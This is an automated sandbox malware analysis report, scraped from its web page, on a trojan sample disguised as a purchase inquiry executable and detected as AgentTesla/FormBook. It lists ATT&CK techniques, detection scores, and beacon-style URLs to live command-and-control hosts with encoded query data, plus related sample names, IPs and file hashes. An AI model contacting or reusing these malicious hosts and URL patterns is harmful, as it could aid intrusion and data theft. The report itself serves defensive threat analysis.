                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                3
                Virtualization/Sandbox Evasion
                LSASS Memory3
                Virtualization/Sandbox Evasion
                Remote Desktop Protocol11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Disable or Modify Tools
                Security Account Manager2
                Process Discovery
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Timestomp
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Behavior Graph (image not reproduced). Behavior Graph ID: 1431986; Sample: INQ No. HDPE-16-GM-00- PI-I...; Startdate: 26/04/2024; Architecture: WINDOWS; Score: 100

                Source | Detection | Scanner | Label | Link
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | 51% | Virustotal | | Browse
                INQ No. HDPE-16-GM-00- PI-INQ-3001.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.solesense.pro/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.paydayloans3.shop/aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.solesense.pro/aleu/?MzYDklf=Fsk+9Ugrf6MFs9mchnETM+3QD2cthhCQsqu2PahB1CBPiKPkA/hmNXSF9ivWSGs/4CiX0i2cy0l6l8SVSxzUF3Q4RMAPDGkyPIDahDw1KMSvyAVfpPYGa57LB1vixmbDZ7oyoAgNkZW7&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.theertyuiergthjk.homes/aleu/?MzYDklf=KKNe6rdgfNo6Wq6sMccsECj9DruDiqz0V/YBvfR/8knlzlDvcza3RWVYHFV7uOHMzESi0Z4HuGcox/fHqa9ciWlD8AlULX7tFKEX0vEvV/3H5nGwz5PpKkk9QKafXX45AA2PEYjdzWMv&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.theertyuiergthjk.homes/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.valentinaetommaso.it/aleu/?MzYDklf=qJYbYwaLgLDJAMSHMJQaEOr73chNsD5VMq73qeoAA4dzyQoAh+hTVoh+ah/e183iVnKHGTOXkcX7G8t3YRyjXe/ogXVNID+KtV4n0lPZ2DbPfuvRPmVg0GTYTl/4fOclA5m+2/uM8Ymx&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.skibinscy-finanse.pl/aleu/?MzYDklf=N0v49flUUQfEWOo/aE7OdIaJv4xdfmBs7J9ivEb+Xo+Q/nq/YMDO//KjhQmhbqKlUVaao73nPs1gVWG10w4sN/a7W8oTa9PDfIw3FkTWG11zhaPiohVHadQfG1I8c2eUqprtDPLWhOJ9&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.paydayloans3.shop/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.colchondealquiler.com/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.polhi.lol/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fairmarty.top/aleu/true
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.83634.cn/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.skibinscy-finanse.pl/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.colchondealquiler.com/aleu/?MzYDklf=heiUU9lLv45IJG5Wd6LJBmuSZbtDNHx122KPvL/NNDCzNkInOevyA08bejzsewnbLAKBPzZGyeY+skKwUglop6X2S27Gspv7OD0R2VJ9wdDlZRLUHIVLQGAdIrEvlBBmGQJQcRJvk2sI&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.83634.cn/aleu/?MzYDklf=/mfxaTJBOgt3JDZkoxaXbiWRJO3cof11tbJm5eA1/p+8DdahBUuKuoWdPETp4wIg5O58ph7A0hS6+wjYiiGEtJ1bmNcMNYXAdylBBvNZ9o6IpjigtOzYHQeGXYHcYUjCnGBIU602CyDs&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.aprovapapafox.com/aleu/?MzYDklf=mEhw182mTcvL4X7W6yJhLslIcG+j3Kkb/q8jOnfIToCvkLfDcLYfug01ytzddJhX/lijb8hpDT2F8KzL6RC5GrlDAC6fqoF7t8GqbmfMFKfVEQELjrUu0IX3uTvnqRm05V4BpU+RhfzS&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.valentinaetommaso.it/aleu/true
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fairmarty.top/aleu/?MzYDklf=1EzsQVnX0vVrGxBYNXB1u7fNxljhjRHJWEXTYZCw6Y45y9QSTO9z6ggEQaWzMFMNeg7sTl3Zf11WKrZHAcHpX9hrZ8kVd6B8qbB5+OCtdAqRU7IipAokYiIG2rDB/a+dgcBIv0Zff4BY&PHaLL=ePmHKpKXdtoDqXhtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.aprovapapafox.com/aleu/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        unknown
                                        Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0INQ No. HDPE-16-GM-00- PI-INQ-3001.exefalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partnersreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.iv.lt/el-pasto-filtras/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seoreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.css?v=20230919001replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.solesense.proyTVsQcNOAKqLIKj.exe, 00000016.00000002.3686434671.000000000595C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://www.iv.lt/sertifikatai/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                          high
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431986
Start date and time: 2024-04-26 07:40:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@18/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 92%
• Number of executed functions: 169
• Number of non-executed functions: 235
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92
• Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
07:40:56 | API Interceptor | 1x Sleep call for process: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe modified
07:41:19 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
08:45:39 | API Interceptor | 10306186x Sleep call for process: replace.exe modified
                                                                                                                                                                          Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                          00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                                                                                                          Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                                                                                                          003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                                                                                                          Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==
                                                                                                                                                                          U_prilogu_je_predracun.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?fk0=89DiTmjnfCUhvYsc&kJZ5QC=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                          Iqgbhvnaowuspb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?D15HD=_t_lMOKbpZu3O9&9WZHdBH=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzITtjVbGwuQSRA==
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          parkingpage.namecheap.comBM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          Pago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0423024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0423023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          vf3ba6qx.as22566.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 103.93.124.160
                                                                                                                                                                          www.skibinscy-finanse.plINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          www.maxiwalls.comRFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          fix01.pfw.djamxtvyk.cloudland3.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 52.175.38.24
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 52.175.38.24
                                                                                                                                                                          www.paydayloans3.shopshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          lb.webnode.ioINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 3.125.172.46
                                                                                                                                                                          http://renovaciondepatentes.webnode.esGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 3.125.172.46
                                                                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 3.73.27.108
                                                                                                                                                                          www.fairmarty.topINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 203.161.46.103
                                                                                                                                                                          www.theertyuiergthjk.homesINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 205.234.233.38
                                                                                                                                                                          www.colchondealquiler.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.76.128.34
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.76.128.34
                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          RACKRAYUABRakrejusLTRFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          NQYYUvHu8f.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                          • 195.181.245.38
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          payment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 185.5.53.18
                                                                                                                                                                          International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          4df902f11590d27189e9113ed654b0481.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 212.24.99.48
                                                                                                                                                                          IMG001.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                          • 62.77.152.0
                                                                                                                                                                          S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                          • 194.135.86.146
                                                                                                                                                                          TIS-DIALOG-ASRUINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          llADOrptJY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 185.234.121.165
                                                                                                                                                                          M2CRoPxCDK.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 213.149.20.214
                                                                                                                                                                          https://r20.rs6.net/tn.jsp?f=001aWvo3AAHeKpzw4Mz_sgYedpUawImPJsIps10Y8KYyNgYNz9veso7-cqLq8Ea4Kz4hKxMhfMBFtf-ffFtVC0q7ivGR36wf1VR8lyGBPIGdyfvSdYQA-i_Ls0DZQM2OGfs5QV_OFuzyeVR1SlSz9DgdpNGEtqd-Xjg&c=&ch=#Y2xpZW50c2VydmljZXNAYmFycm93aGFubGV5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 178.211.133.68
                                                                                                                                                                          LhzvaAYMk3.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 185.234.121.164
                                                                                                                                                                          Ship'_particular_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          MT_PAPA-AGENCY_APPOINTMENT_AND_PDA_QUERY_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          r20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          #U00d6DEME_FATURASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          SERVERCENTRALUSINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 205.234.233.38
                                                                                                                                                                          Yui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 205.234.173.1
                                                                                                                                                                          ndvdikok.vbsGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                                                                          • 205.234.201.153
                                                                                                                                                                          https://ym6hc4gbb.cc.rs6.net/tn.jsp?f=001n209emIAeC5QJJGtmLyCc1JCQhC6WWTJBpDN65UPPB3G7Jc3gS6FE5wY-dlsmfGB2oibtx69nM243xkUAk5hSfd1krgPjddqmNEffcBMlXoUc-7UzTKQzIO6cFbowvNDiHeCqkvDBf2IjYJyuuzL-7jENnNra-V4&c=&ch=&__=///cpsess/guytrscdvfhgjbknkghjfbghklnm/hgjbdsaknjaxbgrak/ryan_howard@office.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                          • 205.234.232.49
                                                                                                                                                                          Scan001-929999.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 198.38.83.196
                                                                                                                                                                          Axis Bank - 67 Account Pending Bank Receipt.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 198.38.83.196
                                                                                                                                                                          No context
                                                                                                                                                                          No context
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                          Entropy (8bit):1.2010398424856006
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:WKucs2RpaP64+0BU/qauOJo1ZrFW0adzuiFfZ24IO884:WDcs2vaP6iBU/qapoadzuiFfY4IO88
                                                                                                                                                                          MD5:8D0B4BB60B0CAB920127B175178ED800
                                                                                                                                                                          SHA1:3B6C1817949B024BF79586A4DE1603E6684F2951
                                                                                                                                                                          SHA-256:A300B8CF2B9AEFDF1F19C7BBDD659AB3D3D18257C5D625CF9102D9C3A74E5FC0
                                                                                                                                                                          SHA-512:FF73A86A492E1A4F66AE2D8694C1C8FF010F109F0042291A366A45A271D65B6A29D8027CCB8B0F178EC1A2FE2BB17093FD8E72618A21DAEF2F52AFAC0DE4EAFC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Fri Apr 26 05:40:58 2024, 0x1205a4 type
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):329647
                                                                                                                                                                          Entropy (8bit):4.30429298653628
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:zK5Er+iSyRAGU4uEqFso5VLTgyCLQ33nx1MHmiEaKhndoDjsX+YAsB:O6r5SyhU4ksofTgyCU33nIL2o3W+P
                                                                                                                                                                          MD5:4EF40C3DF80FF2DD3A772C5C3A4C3E60
                                                                                                                                                                          SHA1:2E6D9011CE0BB3C4A5E118EA259ED7B43C6D50CD
                                                                                                                                                                          SHA-256:86968793A408DA13EF859A54084F23E1486A065A3EF7E2CA9CB94CBC707BC396
                                                                                                                                                                          SHA-512:2FD01188E0FF0FA9AA8CE685ACD1D4BD0168F90DF817AAF2F11510EF291715736AF0E45405D4D8DEC56F0A6D84DF293D43DD2306B9A525C5762FCD7082BE9849
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):8500
                                                                                                                                                                          Entropy (8bit):3.7049620747478076
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:R6l7wVeJ+H6K6YN+SU9T3D6gmfZCmpr689bSgYsf7mm:R6lXJO6K6YESU97D6gmfIYSgLfj
                                                                                                                                                                          MD5:4894C8A1CD15C7B56568499D5A20BACB
                                                                                                                                                                          SHA1:442FA1D97B307A091C144F7BE5F5FAC00CB14916
                                                                                                                                                                          SHA-256:CB9585C4E539300AE611B2D8F680F05ECF9B87C1AE8F762FD88B436D382F9DD2
                                                                                                                                                                          SHA-512:B8CE08812A285668367ECD8A0B6ACF0A2CC45898A9AA20501EA68FDE54950DEFA7D13B815380BD5380D61991EE288B73E441B2D33534036F1092920D210F0BE7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4852
                                                                                                                                                                          Entropy (8bit):4.559696523715462
                                                                                                                                                                          Encrypted:false
